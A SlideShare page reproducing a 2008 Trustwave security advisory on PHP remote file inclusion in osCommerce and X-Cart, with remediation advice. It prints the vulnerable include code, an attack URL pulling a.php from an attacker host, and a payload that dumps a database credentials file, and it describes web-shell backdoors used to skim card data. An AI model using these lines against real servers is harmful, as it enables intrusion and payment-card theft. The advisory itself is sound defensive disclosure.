SlideShare uma empresa Scribd logo

php secure

A
ahmed zaichi
Tecnologia
1 de 5
Baixar para ler offline
E-commerce Security Advisory: PHP Remote File Inclusion Executive Summary In  investigations  of  approximately  300  payment  card  data  security  breaches,  Trustwave’s  compromise  investigations unit has observed an increase in the successful exploitation of PHP‐based e‐commerce Web  sites  via  remote  file‐inclusion  vulnerabilities.  We  believe  that  this  increase  is  due  to  the  prevalence  of  PHP‐based e‐commerce applications and the ease with which an attacker can exploit these applications’  vulnerabilities.     In recent months, Trustwave’s compromise investigations unit has encountered multiple cases in which  an  attacker  took  advantage  of  remote  file‐inclusion  vulnerabilities  in  PHP‐based  e‐commerce  applications.  The  vendors  of  these  applications  have  released  updates  to  secure  the  vulnerabilities,  but  the  root  problem  lies in  the  application  user’s  configuration of  the  applications  and installation  of  PHP  programming language on their server.    Properly  configuring  the  PHP  programming  language  on  a  server  can  easily  eliminate  a  system’s  vulnerability  to  PHP  remote  file‐inclusion  exploits.  Two  configuration  directives  included  within  PHP,  register_globals  and  allow_url_open,  make  the  PHP  remote  file  inclusion  exploit  possible.  When  enabled,  either  of  these  directives  may  allow  malicious  users  to  execute  their  own  PHP  code  on  a  vulnerable  system.    Fortunately,  through  the  php.ini  configuration  file,  register_globals  and  allow_url_open  directives  can  be  disabled  easily.  In  addition,  PHP  versions  4.2.0  or  later  disable  register_globals  by  default,  and  the  directive is not included in PHP version 6.0.    Trustwave  recommends  that  online  merchants  perform  stringent  code  reviews  to  ensure  that  their  e‐ commerce applications are properly patched and that the PHP on their servers is securely configured.    PHP Remote File Inclusion Trustwave  has  seen  an  increase  in  the  successful  exploitation  of  PHP‐based  e‐commerce  Web  sites  via  remote file‐inclusion vulnerabilities. We believe this increase is due to the prevalent use of PHP‐based e‐ commerce applications and the simplicity of exploiting these vulnerabilities.    PHP remote file inclusion allows an attacker to run their own PHP code on a vulnerable Web site. PHP is  particularly susceptible to the remote file‐inclusion exploit because the default installation of vulnerable  versions that leaves register_globals or allow_url_open enabled on the server opens a route through which a  remote system can execute PHP code as if it were located on the local system.   
For example, the include_once.php script included with vulnerable versions of the PHP‐based osCommerce  Online Merchant application provides one such route. The contents of the include_once.php script include  the following:  .  -------- include_once.php -------<? if (!defined($include_file . '__')) { define($include_file . '__', 1); include($include_file); } ?> ---------------------------------  An attacker can then use this file to arbitrarily set the include_file parameter to include code present on a  remote Web site. The attacker would then simply enter the following into their browser (IE, Mozilla):    http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php   This  request  would  execute  the  a.php  script  located  on  the  attacker’s  Web  site  (MYBOX)  on  the  e‐ commerce server. The code included will vary depending on the attacker’s goals.     For example, the following command would output the contents of the application_top.php file present on  the  e‐commerce  Web  site.  The  contents  of  the  file  include  authentication  credentials  (username,  password, database location) for the backend MySQL customer database.    --- a.php --<? passthru("/bin/cat application_top.php")?> ------------  In  an  actual  case  of  PHP  remote  file  inclusion,  the  code  executed  would  be  significantly  more  complex  than in this example and often results in the download of Web‐based backdoors to the local system. Two  common Web‐based backdoors are r57shell and c99shell. These shells include a Web‐based interface that  enables  their  user  to  download  and  upload  files,  create  backdoor  listeners  that  monitor  traffic  on  the  system, send e‐mail, bounce connections to other servers and administrate SQL databases.    The following represents the main interface of the r57shell:                            Copyright 2008, Trustwave Page 2 of 5
        r57shell Interface      With the r57shell copied to the compromised system, the attacker can easily modify existing Web code  from a local Internet browser. In many cases the attacker will modify PHP code associated with the e‐ commerce application checkout process to send cardholder data to an external e‐mail account or force the  storage of cardholder data to the backend database for the attacker to retrieve at a later date.                  Copyright 2008, Trustwave Page 3 of 5
        PHP Remote File Inclusion Diagram Attacker’s Workstation 1. The attacker targets the vulnerable PHP code and instructs the server via a Web browser to include the a.php file present on the attacker’s Web site. Vulnerable PHP-based ecommerce Web si te 2. The a.php PHP script is included and executed on the e-commer ce Web site. Attacker’s Website a.php r57shell.php 3. The a.php PHP script instructs the server to download the r 57shell.php backdoor to the ecommerce Web site. Targeted PHP-based E-commerce Applications and Remediation In a number of our recent investigations of payment card compromises, Trustwave has found a number  of attacks targeting vulnerable versions of PHP‐based e‐commerce applications such as osCommerce and  X‐Cart. In these investigations, Trustwave has uncovered multiple cases in which an attacker utilizes a  remote file‐inclusion exploit to gain access to a system and extract sensitive information. We suspect that  this increase can be traced to the prevalent use of vulnerable versions of these applications and the ease  with which these vulnerabilities can be exploited.     The most common manifestation of the PHP remote file‐inclusion exploit observed by Trustwave results  in the download of a malicious Web‐based backdoor onto an e‐commerce server and the subsequent  alteration of PHP code associated with the checkout process allowing for the harvest of cardholder data.              Copyright 2008, Trustwave Page 4 of 5
Remote file inclusion vulnerabilities in both the osCommerce and X‐Cart applications have been publicly  disclosed:    Remote file inclusion vulnerabilities  Application Vulnerable File Disclosure Date Reference osCommerce Online Merchant v2.1 include_once.php 06/16/2002 Bugtraq ID: 5037 Qualiteam X-Cart 4.x cmpi.php 09/08/2006 Bugtraq ID: 20108 Qualiteam X-Cart 3.5.0 config.php 09/11/2007 Bugtraq ID: 25637 prepare.php smarty.php product.php auth.php   Although the vendors listed above have released updates to patch the vulnerabilities, the root problem  lies on the application user’s side with the configuration of the PHP programming language on their  server.     E‐commerce merchants can easily avoid PHP remote file‐inclusion exploits by properly configuring the  PHP programming language installed on their server. The majority of PHP remote file‐inclusion exploits  are possible because of two configuration directives included within PHP; register_globals and  allow_url_open. When enabled, either of these directives may allow the inclusion of files from a remote site  for local execution.    An administrator can easily disable the register_globals and allow_url_open directives in the php.ini  configuration file. In PHP versions 4.2.0 or later, register_globals is disabled by default. In PHP 6.0, the  register_globals directive has been removed altogether.    In conclusion, to protect against PHP remote file‐inclusion exploits, Trustwave recommends that e‐ commerce merchants perform stringent code reviews to ensure that their e‐commerce applications are  properly patched and securely configured. At the very least, this process should include disabling the  register_globals and allow_url_open PHP directives in the php.ini configuration file.          About Trustwave   Trustwave is a global provider of information security and compliance management solutions to businesses and the  public sector. The company has serviced more than 30,000 organizations throughout the world including banks,  merchants, service providers and software developers that are required to validate compliance with industry best  practices for safeguarding information endorsed by American Express, Discover, MasterCard Worldwide, Visa  International and Visa USA. Trustwave is a leading certificate authority with thousands of secure sockets layer  (SSL) certificates issued. Trustwave is headquartered in Chicago with offices throughout North America, South  America, Europe, the Middle East, Africa, Asia and Australia.  Copyright 2008, Trustwave Page 5 of 5

Recomendados

Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TI
Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TIMenggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TI
Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TIIsmail Fahmi
 
Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
Let's shield Liferay
Let's shield LiferayLet's shield Liferay
Let's shield LiferayJosé A. Jiménez
 
Adding Identity Management and Access Control to your Application
Adding Identity Management and Access Control to your ApplicationAdding Identity Management and Access Control to your Application
Adding Identity Management and Access Control to your ApplicationFernando Lopez Aguilar
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
The requested URL could not be retrieved
The requested URL could not be retrievedThe requested URL could not be retrieved
The requested URL could not be retrievedwoodenpodium3364
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Sumanth Damarla
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 

Recomendados

Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TI
Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TIMenggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TI
Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TIIsmail Fahmi
 
Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
Let's shield Liferay
Let's shield LiferayLet's shield Liferay
Let's shield LiferayJosé A. Jiménez
 
Adding Identity Management and Access Control to your Application
Adding Identity Management and Access Control to your ApplicationAdding Identity Management and Access Control to your Application
Adding Identity Management and Access Control to your ApplicationFernando Lopez Aguilar
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
The requested URL could not be retrieved
The requested URL could not be retrievedThe requested URL could not be retrieved
The requested URL could not be retrievedwoodenpodium3364
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Sumanth Damarla
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Php interview-questions and answers
Php interview-questions and answersPhp interview-questions and answers
Php interview-questions and answerssheibansari
 
Php File Upload
Php File UploadPhp File Upload
Php File Uploadsaeel005
 
cPanel & WHM Glossary
cPanel & WHM GlossarycPanel & WHM Glossary
cPanel & WHM GlossaryMr. Rajendra Mishra
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Prevent hacking
Prevent hackingPrevent hacking
Prevent hackingViswanath Polaki
 
Lfi
LfiLfi
Lfipenetration Tester
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
 
Secure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareVishal Kumar
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
PHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroublePHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroubleImperva
 
WordPress Security Presentation
WordPress Security PresentationWordPress Security Presentation
WordPress Security PresentationAndrew Paton
 
CMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer SystemCMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer SystemEditor IJCATR
 
Vulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP FrameworksVulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP FrameworksValency Networks
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issuesDeepu Thomas
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 

Mais conteúdo relacionado

Semelhante a php secure

Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Php interview-questions and answers
Php interview-questions and answersPhp interview-questions and answers
Php interview-questions and answerssheibansari
 
Php File Upload
Php File UploadPhp File Upload
Php File Uploadsaeel005
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
 
Secure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareVishal Kumar
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
PHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroublePHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroubleImperva
 
WordPress Security Presentation
WordPress Security PresentationWordPress Security Presentation
WordPress Security PresentationAndrew Paton
 
CMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer SystemCMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer SystemEditor IJCATR
 
Vulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP FrameworksVulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP FrameworksValency Networks
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issuesDeepu Thomas
 

Semelhante a php secure (20)

Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Php interview-questions and answers
Php interview-questions and answersPhp interview-questions and answers
Php interview-questions and answers
 
Php File Upload
Php File UploadPhp File Upload
Php File Upload
 
cPanel & WHM Glossary
cPanel & WHM GlossarycPanel & WHM Glossary
cPanel & WHM Glossary
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
Web application security
Web application securityWeb application security
Web application security
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Prevent hacking
Prevent hackingPrevent hacking
Prevent hacking
 
Lfi
LfiLfi
Lfi
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
 
Secure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusion
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft Maalware
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Lasky
 
PHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroublePHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized Trouble
 
WordPress Security Presentation
WordPress Security PresentationWordPress Security Presentation
WordPress Security Presentation
 
CMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer SystemCMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer System
 
Vulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP FrameworksVulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP Frameworks
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issues
 

Último

Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 

Último (20)

Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 

php secure

  • 1. E-commerce Security Advisory: PHP Remote File Inclusion Executive Summary In  investigations  of  approximately  300  payment  card  data  security  breaches,  Trustwave’s  compromise  investigations unit has observed an increase in the successful exploitation of PHP‐based e‐commerce Web  sites  via  remote  file‐inclusion  vulnerabilities.  We  believe  that  this  increase  is  due  to  the  prevalence  of  PHP‐based e‐commerce applications and the ease with which an attacker can exploit these applications’  vulnerabilities.     In recent months, Trustwave’s compromise investigations unit has encountered multiple cases in which  an  attacker  took  advantage  of  remote  file‐inclusion  vulnerabilities  in  PHP‐based  e‐commerce  applications.  The  vendors  of  these  applications  have  released  updates  to  secure  the  vulnerabilities,  but  the  root  problem  lies in  the  application  user’s  configuration of  the  applications  and installation  of  PHP  programming language on their server.    Properly  configuring  the  PHP  programming  language  on  a  server  can  easily  eliminate  a  system’s  vulnerability  to  PHP  remote  file‐inclusion  exploits.  Two  configuration  directives  included  within  PHP,  register_globals  and  allow_url_open,  make  the  PHP  remote  file  inclusion  exploit  possible.  When  enabled,  either  of  these  directives  may  allow  malicious  users  to  execute  their  own  PHP  code  on  a  vulnerable  system.    Fortunately,  through  the  php.ini  configuration  file,  register_globals  and  allow_url_open  directives  can  be  disabled  easily.  In  addition,  PHP  versions  4.2.0  or  later  disable  register_globals  by  default,  and  the  directive is not included in PHP version 6.0.    Trustwave  recommends  that  online  merchants  perform  stringent  code  reviews  to  ensure  that  their  e‐ commerce applications are properly patched and that the PHP on their servers is securely configured.    PHP Remote File Inclusion Trustwave  has  seen  an  increase  in  the  successful  exploitation  of  PHP‐based  e‐commerce  Web  sites  via  remote file‐inclusion vulnerabilities. We believe this increase is due to the prevalent use of PHP‐based e‐ commerce applications and the simplicity of exploiting these vulnerabilities.    PHP remote file inclusion allows an attacker to run their own PHP code on a vulnerable Web site. PHP is  particularly susceptible to the remote file‐inclusion exploit because the default installation of vulnerable  versions that leaves register_globals or allow_url_open enabled on the server opens a route through which a  remote system can execute PHP code as if it were located on the local system.   
  • 2. For example, the include_once.php script included with vulnerable versions of the PHP‐based osCommerce  Online Merchant application provides one such route. The contents of the include_once.php script include  the following:  .  -------- include_once.php -------<? if (!defined($include_file . '__')) { define($include_file . '__', 1); include($include_file); } ?> ---------------------------------  An attacker can then use this file to arbitrarily set the include_file parameter to include code present on a  remote Web site. The attacker would then simply enter the following into their browser (IE, Mozilla):    http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php   This  request  would  execute  the  a.php  script  located  on  the  attacker’s  Web  site  (MYBOX)  on  the  e‐ commerce server. The code included will vary depending on the attacker’s goals.     For example, the following command would output the contents of the application_top.php file present on  the  e‐commerce  Web  site.  The  contents  of  the  file  include  authentication  credentials  (username,  password, database location) for the backend MySQL customer database.    --- a.php --<? passthru("/bin/cat application_top.php")?> ------------  In  an  actual  case  of  PHP  remote  file  inclusion,  the  code  executed  would  be  significantly  more  complex  than in this example and often results in the download of Web‐based backdoors to the local system. Two  common Web‐based backdoors are r57shell and c99shell. These shells include a Web‐based interface that  enables  their  user  to  download  and  upload  files,  create  backdoor  listeners  that  monitor  traffic  on  the  system, send e‐mail, bounce connections to other servers and administrate SQL databases.    The following represents the main interface of the r57shell:                            Copyright 2008, Trustwave Page 2 of 5
  • 4.         PHP Remote File Inclusion Diagram Attacker’s Workstation 1. The attacker targets the vulnerable PHP code and instructs the server via a Web browser to include the a.php file present on the attacker’s Web site. Vulnerable PHP-based ecommerce Web si te 2. The a.php PHP script is included and executed on the e-commer ce Web site. Attacker’s Website a.php r57shell.php 3. The a.php PHP script instructs the server to download the r 57shell.php backdoor to the ecommerce Web site. Targeted PHP-based E-commerce Applications and Remediation In a number of our recent investigations of payment card compromises, Trustwave has found a number  of attacks targeting vulnerable versions of PHP‐based e‐commerce applications such as osCommerce and  X‐Cart. In these investigations, Trustwave has uncovered multiple cases in which an attacker utilizes a  remote file‐inclusion exploit to gain access to a system and extract sensitive information. We suspect that  this increase can be traced to the prevalent use of vulnerable versions of these applications and the ease  with which these vulnerabilities can be exploited.     The most common manifestation of the PHP remote file‐inclusion exploit observed by Trustwave results  in the download of a malicious Web‐based backdoor onto an e‐commerce server and the subsequent  alteration of PHP code associated with the checkout process allowing for the harvest 